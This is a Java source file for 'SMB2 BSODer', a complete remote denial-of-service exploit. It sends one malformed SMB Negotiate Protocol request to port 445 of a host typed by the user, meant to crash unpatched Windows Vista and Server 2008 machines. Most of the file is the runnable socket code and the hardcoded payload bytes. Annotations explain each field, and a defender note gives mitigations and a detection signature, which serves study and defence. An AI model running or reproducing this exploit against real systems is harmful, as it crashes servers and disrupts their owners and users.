/*
 * Name:    SMB2 BSODer
 * Version: 1.0
 *
 * Description: This program exploits an SMB2 protocol flaw utilizing a vulnerability
 *              first discovered by Laurent Gaffié. Tested to crash MS Windows Vista
 *              and MS Windows Server 2008 (prior to R2) with file sharing enabled.
 *
 *              http://seclists.org/fulldisclosure/2009/Sep/0039.html
 *              http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
 *
 * Usage: java -jar SMB2_BSODer.jar
 *
 * Developed By:    Randal T. Rioux
 *                  Procyon Labs
 *                  http://www.procyonlabs.com
 *
 * Hosted: http://www.procyonlabs.com/software/smb2_bsoder
 *
 */

package smb2_bsoder;

import java.io.*;
import java.net.*;

/**
 * Sends one deliberately malformed SMB "Negotiate Protocol" request to TCP port
 * 445 of a host typed on standard input, then exits. The only field that departs
 * from a normal negotiate request is "Process ID High" (see the inline comment on
 * the payload); an SMB2 implementation affected by the flaw named in the file
 * header crashes on receipt, so the effect is a remote denial of service.
 *
 * Defender notes: the request is unauthenticated and is the first bytes of the TCP
 * session, so exposure is removed by applying the vendor's fix and by not exposing
 * port 445 beyond trusted networks. A negotiate request with a nonzero
 * "Process ID High" value is a simple, low-false-positive detection signature for
 * network monitoring. The program never reads a reply and sends the packet once.
 */
public class Main {
    /**
     * Entry point: prompts for the target, sends the payload, closes everything.
     *
     * @param args ignored; the target is read interactively from stdin
     * @throws IOException only from the close() calls at the end (all other I/O
     *         failures are caught and turned into System.exit(1))
     */
    public static void main(String[] args) throws IOException {

        // ask for target IP
        System.out.print("Enter target's IP address: ");
        BufferedReader in = new BufferedReader(new InputStreamReader(System.in));
        String IP = null;

        // NOTE(review): readLine() returns null at end of input, and nothing below
        // checks for that or validates the text. new Socket(null, 445) resolves to the
        // loopback address, so an empty stdin aims the packet at the local machine.
        try {
            IP = in.readLine();
        } catch (IOException ioe) {
            System.out.println("IO error trying to read IP address!");
            System.exit(1);
        }

        // define array to contain bad hex ops
        // Layout: 4-byte NetBIOS session header (length 0x90 = 144, which matches the
        // 144 SMB bytes that follow), then a 32-byte SMB1 header, then the negotiate
        // body. The dialect list advertises "SMB 2.002", which is what steers an
        // SMB2-capable server into the vulnerable code path.
        byte[] exploitCode = {(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x90, // Begin SMB header: Session message
                              (byte)0xff,(byte)0x53,(byte)0x4d,(byte)0x42, // Server Component: SMB
                              (byte)0x72,(byte)0x00,(byte)0x00,(byte)0x00, // Negotiate Protocol
                              (byte)0x00,(byte)0x18,(byte)0x53,(byte)0xc8, // Operation 0x18 and sub 0xc853
                              (byte)0x00,(byte)0x26,                       // Process ID High: Normal operation *should* be "\x00\x00"
                                                                           // ^ the malformed field; everything else is a routine negotiate
                              // Signature (8 bytes, zero), Reserved (2), TID 0xffff, PID low 0xfeff, UID 0, MID 0
                              (byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,
                              (byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0xff,(byte)0xff,
                              (byte)0xff,(byte)0xfe,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,
                              // WordCount 0x00, ByteCount 0x006d (109, the exact length of the dialect
                              // list below); each dialect is 0x02 followed by a NUL-terminated ASCII name:
                              // "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
                              // "LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002"
                              (byte)0x00,(byte)0x6d,(byte)0x00,(byte)0x02,(byte)0x50,(byte)0x43,
                              (byte)0x20,(byte)0x4e,(byte)0x45,(byte)0x54,(byte)0x57,(byte)0x4f,
                              (byte)0x52,(byte)0x4b,(byte)0x20,(byte)0x50,(byte)0x52,(byte)0x4f,
                              (byte)0x47,(byte)0x52,(byte)0x41,(byte)0x4d,(byte)0x20,(byte)0x31,
                              (byte)0x2e,(byte)0x30,(byte)0x00,(byte)0x02,(byte)0x4c,(byte)0x41,
                              (byte)0x4e,(byte)0x4d,(byte)0x41,(byte)0x4e,(byte)0x31,(byte)0x2e,
                              (byte)0x30,(byte)0x00,(byte)0x02,(byte)0x57,(byte)0x69,(byte)0x6e,
                              (byte)0x64,(byte)0x6f,(byte)0x77,(byte)0x73,(byte)0x20,(byte)0x66,
                              (byte)0x6f,(byte)0x72,(byte)0x20,(byte)0x57,(byte)0x6f,(byte)0x72,
                              (byte)0x6b,(byte)0x67,(byte)0x72,(byte)0x6f,(byte)0x75,(byte)0x70,
                              (byte)0x73,(byte)0x20,(byte)0x33,(byte)0x2e,(byte)0x31,(byte)0x61,
                              (byte)0x00,(byte)0x02,(byte)0x4c,(byte)0x4d,(byte)0x31,(byte)0x2e,
                              (byte)0x32,(byte)0x58,(byte)0x30,(byte)0x30,(byte)0x32,(byte)0x00,
                              (byte)0x02,(byte)0x4c,(byte)0x41,(byte)0x4e,(byte)0x4d,(byte)0x41,
                              (byte)0x4e,(byte)0x32,(byte)0x2e,(byte)0x31,(byte)0x00,(byte)0x02,
                              (byte)0x4e,(byte)0x54,(byte)0x20,(byte)0x4c,(byte)0x4d,(byte)0x20,
                              (byte)0x30,(byte)0x2e,(byte)0x31,(byte)0x32,(byte)0x00,(byte)0x02,
                              (byte)0x53,(byte)0x4d,(byte)0x42,(byte)0x20,(byte)0x32,(byte)0x2e,
                              (byte)0x30,(byte)0x30,(byte)0x32,(byte)0x00};

        // define socket info, establish connection and send data
        // The connect uses the JVM default (no explicit connect or read timeout), and
        // no response is read: the payload is written and the session is torn down.
        Socket smbSocket = null;
        DataOutputStream sendData = null;

        try {
            smbSocket = new Socket(IP, 445);
            sendData = new DataOutputStream(smbSocket.getOutputStream());
            sendData.write(exploitCode);

        } catch (UnknownHostException e) {
            System.err.println("Who is this? I see nothing at " + IP);
            System.exit(1);
        } catch (IOException e) {
            System.err.println("Couldn't get I/O for "
                               + "the connection to: " + IP);
            System.exit(1);
        }


        // goodnight
        // Both catch blocks above call System.exit, so sendData and smbSocket are
        // non-null here. Closing the socket's output stream also closes the socket,
        // which makes the final smbSocket.close() a harmless no-op.
        in.close();
        sendData.close();
	smbSocket.close();
    }
}
